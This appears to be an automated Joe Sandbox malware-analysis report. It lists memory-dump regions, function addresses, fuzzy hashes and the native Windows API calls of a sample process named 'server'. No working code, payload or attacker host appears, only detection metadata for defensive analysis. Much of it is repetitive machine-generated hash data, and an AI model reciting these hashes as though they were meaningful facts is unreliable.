Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30fec57804b747b67434820115ebebdb68acaf62cbd9a57e9e63b3227a9329bf
Instruction ID: 4fbdd20bfe2539255dc0016203d361fcd445fe170af4b769666727ab8f60476f
Opcode Fuzzy Hash: 30fec57804b747b67434820115ebebdb68acaf62cbd9a57e9e63b3227a9329bf
Instruction Fuzzy Hash: 880152305093429FCB00EB74D46955D7BE1EFC5308B44886DE455CB36AEE795C08CB72

Function 02FD00B8 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec9f65b6f15c98bd0398bf7f366ea2bd3751086035a620379f92fee3401b022b
Instruction ID: 56cf0af5df5bfef182cb7e077c024aa29279b6e4b2b969b0a0a75ddefb9a44cb
Opcode Fuzzy Hash: ec9f65b6f15c98bd0398bf7f366ea2bd3751086035a620379f92fee3401b022b
Instruction Fuzzy Hash: 6DF02831A05304AFEB04EBB08C12B9E3B77DF42724F0484AAD200CB1C2DE359805C7A0

Function 02FD00A8 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe11ef1de9df7ec6a470ad5f3757966c0ecb71f5f7f92e16454764e98813fcbd
Instruction ID: 359225f9070444f258011943a940b33053b71e7cb4da4deaae4d0e366871d194
Opcode Fuzzy Hash: fe11ef1de9df7ec6a470ad5f3757966c0ecb71f5f7f92e16454764e98813fcbd
Instruction Fuzzy Hash: EEF0FC72E013046FEB14DBB08C52BAE7B72DF81734F1486AED5519B2C1DE3288458790

Function 039708A0 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4627737668.0000000003970000.00000040.00000020.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3970000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bf77a17c3e8da0c4cb46b30df8c31357310a763e4aa26229cc1396c023fce79
Instruction ID: 97f88f5711ec286dfb75e00f2c05b16b1bce584d53fab2da7c88f5d25fb234f5
Opcode Fuzzy Hash: 8bf77a17c3e8da0c4cb46b30df8c31357310a763e4aa26229cc1396c023fce79
Instruction Fuzzy Hash: 88F01935148644DFC306CF40D980B55FBA6EB89718F28CAADE9491BB62C737E813DB81

Function 03970606 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4627737668.0000000003970000.00000040.00000020.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3970000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 516e9812a9b71d10de6839d92ff4b6503073639b5b53ec056a65c49158e5e83b
Instruction ID: da21d03a596a9f079698721f6df4792726bf8ee24b66bb260aaca1e47d6876c8
Opcode Fuzzy Hash: 516e9812a9b71d10de6839d92ff4b6503073639b5b53ec056a65c49158e5e83b
Instruction Fuzzy Hash: BFE09276A007004F9650CF0BEC81852F794EB84630B48C07FDC0D8BB11D23AB509CAA5

Function 02FD41FF Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86dd356fd6852e4d2bccdfede449142d7d65898214784236aade417a30b44bf7
Instruction ID: bc6ea964a9bbe9873e44c989058e15d53dd1a9980c051cf10353e997d2800699
Opcode Fuzzy Hash: 86dd356fd6852e4d2bccdfede449142d7d65898214784236aade417a30b44bf7
Instruction Fuzzy Hash: 20D0173091624CAFC740DFAADD4169D7BB9EF46214B1401FAA849C3661EA319E05DB81

Function 02FD3010 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2674e1caf1a57b3801bd7315116e0a00892a631019949527bc8acda4ac6e1d8
Instruction ID: 27849edd0dd9a8a011efb07faf1f0ce017f1feb55a5980e808c45d16b4e7e5ca
Opcode Fuzzy Hash: d2674e1caf1a57b3801bd7315116e0a00892a631019949527bc8acda4ac6e1d8
Instruction Fuzzy Hash: C2E0123424A3C08FCB265774942885D3F759F5710935948FEC85A9B766DA7ED442CF10

Function 02FD92FF Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 718598f751b34d9ab79f02b7e706b59c154be8f47cf289126002a3b3dc148e6f
Instruction ID: 40e67d56b32b8f68d13b1826ea5de379c86e4a66b8b838fec6c8bfefc283577d
Opcode Fuzzy Hash: 718598f751b34d9ab79f02b7e706b59c154be8f47cf289126002a3b3dc148e6f
Instruction Fuzzy Hash: 2DD0A930304200CFC320EB6EC404E81B7E8EF4A12870A00FAE588CB622CA329C0087E2

Function 00D923F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4624137224.0000000000D92000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D92000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d92000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 138f51e368083e51dc5c87b62decd6cac69310fe1c88b35e23e008287a24167f
Instruction ID: c13ce81c7a7853b7c3ff7678dc1c9d2fdb4fe7fcf8a4db5b9e12abdc56c2201c
Opcode Fuzzy Hash: 138f51e368083e51dc5c87b62decd6cac69310fe1c88b35e23e008287a24167f
Instruction Fuzzy Hash: B9D05E792056C15FE7169B1CC1A5FA537E4AB61708F4A44F9A8008B7B3C768E981D260

Function 02FD4208 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 238525b23445c64a037d386fb2f92dded9e72f13c6c1140210675d9f59726338
Instruction ID: d03596e90d20cf07d8f1ab33c7e2b084cc7977fba4a22aa0afa2cb7ab65af6a7
Opcode Fuzzy Hash: 238525b23445c64a037d386fb2f92dded9e72f13c6c1140210675d9f59726338
Instruction Fuzzy Hash: 54D0A930A0220CEF8700DFA8DC0089DB7F8EB46204B0000EAA809C3320EE315E00DB80

Function 00D923BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4624137224.0000000000D92000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D92000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d92000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7f216d1f378e3c29f0a50602d3a1d24110291110177c1b351266548744ec2f3
Instruction ID: cfffc25cc534d936c67d00f00a9e151acfb6d22ff12e3abfe7a894f7c6355aa0
Opcode Fuzzy Hash: d7f216d1f378e3c29f0a50602d3a1d24110291110177c1b351266548744ec2f3
Instruction Fuzzy Hash: A3D05E342011814BDB15DB0CC6D4F6937D4AB40705F0A44ECAC108B762C3B8EC81CA10

Function 02FD92CF Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff221e70cf1e0ad26309eefa33eb71a120bde8db9b9e64eb4845617323bf7cff
Instruction ID: e698305366987a78fa3114de69e42735083e92ccc69c23036d8b6ba77d3e3f5f
Opcode Fuzzy Hash: ff221e70cf1e0ad26309eefa33eb71a120bde8db9b9e64eb4845617323bf7cff
Instruction Fuzzy Hash: 5FD0A73584A248DFCB01CBB19C598ACBF709E4213071003DED82BC33E1EE7509048A11

Function 02FD0067 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f31a59dcc80fcf549ff7c45e7744f81dba2885fae1d06142deaffa31ea4a74b
Instruction ID: e694ad531afc47efd7fe7af736306e9c8001ac8ec2bd70118392d26eae461d4d
Opcode Fuzzy Hash: 4f31a59dcc80fcf549ff7c45e7744f81dba2885fae1d06142deaffa31ea4a74b
Instruction Fuzzy Hash: 76D012218053419EC701C765E8687897B959756219F88825AD0204A3A5DBA9490CCBB1

Function 02FD9308 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e57140f4d052c5cf85b03a9977f2a93542b5f5a85d2b6f5786358d98744347c6
Instruction ID: f1d9fc7147baf6d4a94d3acad6953a2153dc21c175acb30d21328e5c2d121452
Opcode Fuzzy Hash: e57140f4d052c5cf85b03a9977f2a93542b5f5a85d2b6f5786358d98744347c6
Instruction Fuzzy Hash: 99C08C31300114CBC610EB6CD008DD6B3ECEF4D124B1144BAE148C7711CE72AC0047E1

Non-executed Functions

Function 00A19630 Relevance: 1.6, APIs: 1, Instructions: 52filenativeCOMMON

Download Yara Rule

APIs

NtQueryDirectoryFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00A19688

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: DirectoryFileQuery
String ID:
API String ID: 3295332484-0
Opcode ID: e016d5a9b0e835b24a026b57b49fb27793e65614681a945db1eef868b8630ffc
Instruction ID: e2d713942009abd7d099a5205279a8b93ba5bedb50902ace5cd88322457d036b
Opcode Fuzzy Hash: e016d5a9b0e835b24a026b57b49fb27793e65614681a945db1eef868b8630ffc
Instruction Fuzzy Hash: 29019AB2205299BF9B11CF9ADCD4DEBBBACFB9E654B444144BA5897202C220AC51C7B0

Function 00A18FBC Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON

Download Yara Rule

APIs

NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00A19014

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: ed7297171fd6e91158564f938ff88273e9fa3e69351c21b6d960c0e039572ccf
Instruction ID: 68bef3901b9c44ab9a704c3e8fa90350119e557454a92941fc1a4c9f798cd52e
Opcode Fuzzy Hash: ed7297171fd6e91158564f938ff88273e9fa3e69351c21b6d960c0e039572ccf
Instruction Fuzzy Hash: BB014AB6200259BF9B10CE8ADDC4DEBBBACFB8D794B444115BB1897202C234AC51CBB0

Function 00A19442 Relevance: 1.5, APIs: 1, Instructions: 49nativeCOMMON

Download Yara Rule

APIs

NtNotifyChangeKey.NTDLL(?,?,?,?,?,?,?,?,?,?), ref: 00A19494

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: ChangeNotify
String ID:
API String ID: 3893256919-0
Opcode ID: f9ee59deac9feb7b0b03a0afe9906348372d3845d56d24a2341723e269832b5d
Instruction ID: 63f5712ff0ead36a72c2b5456fb15f60641efdf03d2906a357d6f861ed125e72
Opcode Fuzzy Hash: f9ee59deac9feb7b0b03a0afe9906348372d3845d56d24a2341723e269832b5d
Instruction Fuzzy Hash: 2601CDB6205189BF9B10CEDADCD4DFBBFACEB9E290B484005FA4993201C130AC51C7B0

Function 00A197AE Relevance: 1.5, APIs: 1, Instructions: 49filenativeCOMMON

Download Yara Rule

APIs

NtLockFile.NTDLL(?,?,?,?,?,?,?,?,?,?), ref: 00A19800

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: FileLock
String ID:
API String ID: 3169042693-0
Opcode ID: b93d204914edf88e7238b3682643cf6fcfbeb0a5a36da7da8f81a4a2c11c143e
Instruction ID: 2e057f77f62c5b7b60f65d5881b0af43b7aab1297356aeba4371389349f91d47
Opcode Fuzzy Hash: b93d204914edf88e7238b3682643cf6fcfbeb0a5a36da7da8f81a4a2c11c143e
Instruction Fuzzy Hash: 7401BBB6205289BFDB00CEDADCD4DFBBFACEB9E654B484145FA4887201C120AC51C7B0

Function 00A19130 Relevance: 1.5, APIs: 1, Instructions: 48filenativeCOMMON

Download Yara Rule

APIs

NtFsControlFile.NTDLL(?,?,?,?,?,?,?,?,?,?), ref: 00A19180

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: ControlFile
String ID:
API String ID: 1795486800-0
Opcode ID: 1e6c76b9375e9b5c4303283b7319c57bde4a219084547ff0a773de789090b2b0
Instruction ID: 35c89bd7250d1f933bc3f189166fb93bb8838f6221c1e6a46c199e0f676dc965
Opcode Fuzzy Hash: 1e6c76b9375e9b5c4303283b7319c57bde4a219084547ff0a773de789090b2b0
Instruction Fuzzy Hash: 4F017DB6600259FF9B10DE8ADCC9DEBBB6CFB9D794B444105BB1897202C270AC51CBB0

Function 00A19698 Relevance: 1.5, APIs: 1, Instructions: 48filenativeCOMMON

Download Yara Rule

APIs

NtQueryDirectoryFileEx.NTDLL(?,?,?,?,?,?,?,?,?,?), ref: 00A196E8

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
